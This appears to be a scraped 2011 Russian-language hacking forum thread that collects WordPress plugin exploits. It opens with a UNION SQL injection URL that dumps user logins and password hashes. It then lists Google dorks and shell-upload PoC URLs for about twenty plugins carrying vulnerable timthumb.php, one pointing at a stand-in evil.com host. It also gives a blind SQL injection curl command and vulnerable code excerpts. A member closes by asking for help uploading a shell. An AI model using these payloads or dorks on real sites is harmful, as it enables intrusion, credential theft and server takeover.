http://wp/wp-contents/plugins/polylang/uninstall.php?id=-666666666+union+select+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+from+wp_users+--
|
|
|
|
13.10.2011, 20:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
5429
Репутация:
-1
|
|
Код:
Code:
# Exploit Title: Multiple Wordpress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
---
Description
---
The following Wordpress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Reference: http://www.exploit-db.com/exploits/17602/
# Plugin: Category Grid View Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php
# Plugin: Auto Attachments Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php
# Plugin: WP Marketplace Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php
# Plugin: DP Thumbnail Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php
# Plugin: Vk Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php
# Plugin: Rekt Slideshow Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL
Must first base64 encode the URL.
The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php
# Plugin: CAC Featured Content Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php
# Plugin: Rent A Car Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php
# Plugin: LISL Last Image Slider Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php
# Plugin: Islidex Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php
# Plugin: Kino Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php
# Plugin: Cms Pack Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php
# Plugin: A Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php
# Plugin: Category List Portfolio Page Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php
# Plugin: Really Easy Slider Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php
# Plugin: Verve Meta Boxes Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php
# Plugin: User Avatar Wordpress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php
Requires register_globals to be enabled and at least one user account to have an avatar directory.
The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php
# Plugin: Extend Wordpress Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php
|
|
|
|
13.10.2011, 20:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
5429
Репутация:
-1
|
|
Код:
Code:
# Exploit Title: WordPress Mingle Forum plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
---------------
Vulnerable code
---------------
if (!isset($_POST['edit_post_submit'])) {
$errormsg = apply_filters('wpwf_check_guestinfo',"");
if ($errormsg != "") {
$error = true;
wp_die($errormsg);
}
}
if($options['forum_captcha'] == true && !$user_ID){
include_once(WPFPATH."captcha/shared.php");
$wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
// do nothing
}
else {
$error = true;
$msg = __("Security code does not match", "mingleforum");
wp_die($msg);
}
}
...
if(isset($_POST['edit_post_submit'])){
$myReplaceSub = array("'", "\\");
$subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
$content = $mingleforum->input_filter($_POST['message']);
$thread = $mingleforum->check_parms($_POST['thread_id']);
$edit_post_id = $_POST['edit_post_id'];
if($subject == ""){
$msg .= "".__("An error occured", "mingleforum")."";
$msg .= ("".__("You must enter a subject", "mingleforum")."");
$error = true;
}
elseif($content == ""){
$msg .= "".__("An error occured", "mingleforum")."";
$msg .= ("".__("You must enter a message", "mingleforum")."");
$error = true;
}
if ($error) wp_die($msg);
//SECURITY FIX NEEDED t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
$wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)
|
|
|
|
13.10.2011, 20:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
5429
Репутация:
-1
|
|
[B]WordPress Collision Testimonials plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)
---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
$id = $_GET['id'];
mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
};
[/CODE]
|
|
|
|
19.10.2011, 02:14
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
Провел на форуме:
706093
Репутация:
97
|
|
Кто нибудь крутил вот эту скулю? Я так и не смог шелл залить, может у кого пройдёт отпишите.. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
